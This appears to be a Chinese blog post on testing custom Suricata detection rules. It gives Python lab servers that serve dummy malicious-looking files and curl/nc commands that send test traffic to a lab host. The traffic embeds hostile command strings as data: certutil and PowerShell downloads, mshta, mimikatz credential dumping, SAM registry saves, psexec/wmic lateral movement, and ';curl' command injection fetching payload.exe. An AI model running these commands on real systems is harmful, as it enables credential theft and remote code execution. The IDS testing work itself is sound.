编写powershell、certutil、regsvr32请求及下载的suricata规则-测试(9001188-9001199、9001000)
1.主机A开启服务
from http.server import BaseHTTPRequestHandler, HTTPServer HOST = "0.0.0.0" PORT = 80 class Handler(BaseHTTPRequestHandler): def log_message(self, format, *args): return def do_GET(self): path = self.path if path == "/lnk": body = b"dummy" self.send_response(200) self.send_header("Content-Disposition", 'attachment; filename=test.lnk') self.send_header("Content-Type", "application/octet-stream") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/hta": body = b"<html><script>msgbox(1)</script></html>" self.send_response(200) self.send_header("Content-Disposition", 'attachment; filename=test.hta') self.send_header("Content-Type", "application/hta") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/iso": body = b"ISOIMAGE" self.send_response(200) self.send_header("Content-Disposition", 'attachment; filename=test.iso') self.send_header("Content-Type", "application/x-iso9660-image") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/one": body = b"ONENOTE" self.send_response(200) self.send_header("Content-Disposition", 'attachment; filename=test.one') self.send_header("Content-Type", "application/octet-stream") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/js": body = b"alert(1);" self.send_response(200) self.send_header("Content-Disposition", 'attachment; filename=test.js') self.send_header("Content-Type", "application/javascript") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/pdf_active": body = b"%PDF-1.7\n/OpenAction /JavaScript /Launch /EmbeddedFile /XFA\n" self.send_response(200) self.send_header("Content-Type", "application/pdf") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/pdf_uri": body = b"%PDF-1.7\n/URI(http://evil.test/) /SubmitForm\n" self.send_response(200) self.send_header("Content-Type", "application/pdf") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/docm": body = b"PK\x03\x04 macro" self.send_response(200) self.send_header("Content-Disposition", 'attachment; filename=test.docm') self.send_header( "Content-Type", "application/vnd.ms-word.document.macroEnabled.12") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/macro": body = b"AutoOpen\nCreateObject(\"WScript.Shell\")\ncmd /c calc.exe\n" self.send_response(200) self.send_header("Content-Type", "application/octet-stream") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/template": body = b'attachedTemplate INCLUDEPICTURE http://10.66.66.1/x TargetMode="External"' self.send_response(200) self.send_header("Content-Type", "application/octet-stream") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/follina": body = b'ms-msdt: PCWDiagnostic IT_BrowseForFile search-ms:' self.send_response(200) self.send_header("Content-Type", "text/html") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) elif path == "/chm": body = b"dummy" self.send_response(200) self.send_header("Content-Disposition", 'attachment; filename=test.chm') self.send_header("Content-Type", "application/octet-stream") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) else: body = b"OK\n" self.send_response(200) self.send_header("Content-Type", "text/plain") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) def do_POST(self): length = int(self.headers.get("Content-Length", "0")) _ = self.rfile.read(length) if length > 0 else b"" body = b"OK\n" self.send_response(200) self.send_header("Content-Type", "text/plain") self.send_header("Content-Length", str(len(body))) self.end_headers() self.wfile.write(body) HTTPServer((HOST, PORT), Handler).serve_forever()
2.主机B发送测试请求
1.测试9001188 for i in 1 2; do curl -A "Mozilla/5.0" \ -H 'X-Test: powershell Invoke-WebRequest http://10.66.66.1/a.ps1 ; Net.WebClient DownloadString' \ "http://10.66.66.1/ok" echo done 2.测试9001189 for i in 1 2; do curl -A "Mozilla/5.0" \ -H 'X-Test: certutil -urlcache -f http://10.66.66.1/p.exe p.exe' \ "http://10.66.66.1/ok" echo done 3.测试9001190 for i in 1 2; do curl -A "Mozilla/5.0" \ -H 'X-Test: mshta http://10.66.66.1/test.hta' \ "http://10.66.66.1/ok" echo done 4.测试9001191 for i in 1 2; do curl -O http://10.66.66.1/lnk done for i in 1 2; do curl -O http://10.66.66.1/hta done 5.测试9001192 for i in 1 2; do curl -O http://10.66.66.1/iso done 6.测试9001193 for i in 1 2; do curl -O http://10.66.66.1/js done 7.测试9001194 curl http://10.66.66.1/pdf_active -o test_active.pdf 8.测试9001195 curl http://10.66.66.1/pdf_uri -o test_uri.pdf 9.测试9001196 curl -O http://10.66.66.1/docm 10.测试9001197 curl http://10.66.66.1/macro -o macro.bin 11.测试9001198 curl http://10.66.66.1/template -o template.bin 12.测试9001199 curl http://10.66.66.1/follina -o follina.html 13.测试9001000 curl -O http://10.66.66.1/chm
3.主机A开启监听(9001003-9001019)
import socket import threading from http.server import BaseHTTPRequestHandler, HTTPServer HOST = "0.0.0.0" # 3389/445/5985/5986: 只要能接收 TCP 流量即可 RAW_PORTS = [3389, 445, 5985, 5986] def raw_listener(port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, port)) s.listen(128) print(f"[+] listening tcp/{port}") while True: conn, addr = s.accept() threading.Thread(target=handle_raw, args=( conn, addr, port), daemon=True).start() def handle_raw(conn, addr, port): try: while True: data = conn.recv(4096) if not data: break try: conn.sendall(b"OK\r\n") except Exception: pass finally: conn.close() class Handler(BaseHTTPRequestHandler): def log_message(self, fmt, *args): return def do_GET(self): path = self.path body = b"OK\n" ctype = "text/plain" # 9001014: 命令执行输出 if "whoami" in path or "systeminfo" in path: body = b"Windows IP Configuration\r\nwhoami\r\nsysteminfo\r\n" ctype = "text/plain" # 9001015: PE elif "a.exe" in path or "payload.exe" in path: body = b"MZTESTPAYLOAD" ctype = "application/octet-stream" # 9001016: ELF / shell elif "a.elf" in path: body = b"\x7fELFTESTPAYLOAD" ctype = "application/octet-stream" elif "a.sh" in path: body = b"#!/bin/bash\necho test\n" ctype = "text/plain" # 9001018: Electron / WebView bridge + downloader elif path.startswith("/electron"): body = ( b"shell.openExternal('x');" b"child_process.exec('powershell -nop -w hidden');" b"window.chrome.webview.postMessage('ok');" ) ctype = "text/html" # 9001019: 压缩包诱饵,body 里带 PK 和恶意扩展名 elif path.startswith("/archive"): body = b"PK\x03\x04aaaaevil.lnkbbbbdropper.jsccccpayload.hta" ctype = "application/zip" self.send_response(200) self.send_header("Content-Type", ctype) self.send_header("Content-Length", str(len(body))) self.send_header("Connection", "close") self.end_headers() self.wfile.write(body) def do_POST(self): length = int(self.headers.get("Content-Length", "0")) _ = self.rfile.read(length) if length > 0 else b"" body = b"OK\n" self.send_response(200) self.send_header("Content-Type", "text/plain") self.send_header("Content-Length", str(len(body))) self.send_header("Connection", "close") self.end_headers() self.wfile.write(body) for p in RAW_PORTS: threading.Thread(target=raw_listener, args=(p,), daemon=True).start() print("[+] listening tcp/80") HTTPServer((HOST, 80), Handler).serve_forever()
4.主机B发送测试请求
1.测试9001006 for i in 1 2 3 4 5; do printf 'Cookie: mstshash=administrator\r\n' | nc 10.66.66.1 3389 sleep 1 done 2.测试9001007 for i in 1 2 3; do printf 'ADMIN$ IPC$ C$' | nc 10.66.66.1 445 sleep 1 done 3.测试9001008 for i in 1 2; do printf 'svcctl psexec remcom atsvc winreg' | nc 10.66.66.1 445 sleep 1 done 4.测试9001009 for i in 1 2; do printf 'POST /wsman HTTP/1.1\r\nHost: 10.66.66.1\r\nContent-Length: 60\r\n\r\nShellId=1&rsp:CommandLine=whoami&wsmid:Command=powershell' | nc 10.66.66.1 5985 sleep 1 done 5.测试9001010 for i in 1 2; do printf 'wmic /node:10.66.66.1 process call create "cmd.exe /c whoami" Win32_Process Create(' | nc 10.66.66.1 445 sleep 1 done 6.测试9001003 printf 'GET / HTTP/1.1\r\nHost: 10.66.66.1\r\nX-Test: mimikatz sekurlsa::logonpasswords lsass.dmp\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 7.测试9001004 printf 'GET / HTTP/1.1\r\nHost: 10.66.66.1\r\nX-Test: reg save HKLM\\SAM sam.save & reg save HKLM\\SYSTEM system.save & vssadmin create shadow\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 8.测试9001005 for i in 1 2; do printf 'GET / HTTP/1.1\r\nHost: 10.66.66.1\r\nX-Test: whoami /all && systeminfo && ipconfig /all && nltest /dclist\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 sleep 1 done 9.测试9001011 for i in 1 2; do printf 'GET / HTTP/1.1\r\nHost: 10.66.66.1\r\nX-Test: whoami /all && systeminfo && ipconfig /all && nltest /dclist\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 sleep 1 done 10.测试9001012 printf 'GET / HTTP/1.1\r\nHost: 10.66.66.1\r\nX-Test: CurrentVersion\\Run RunOnce Startup\\ Image File Execution Options Userinit\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 11.测试9001014 printf 'GET /a;whoami HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 12.测试9001015 printf 'GET /a;curl http://x/payload.exe HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 13.测试9001016 printf 'GET /a;curl http://x/a.elf HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 14.测试9001017 for i in 1 2 3 4 5; do printf 'GET /checkin HTTP/1.1\r\nHost: 10.66.66.1\r\nConnection: close\r\n\r\n' | nc 10.66.66.1 80 sleep 1 done 15.测试9001018 curl http://10.66.66.1/electron -o /tmp/electron.txt 16.测试9001019 curl http://10.66.66.1/archive -o /tmp/archive.zip
浙公网安备 33010602011771号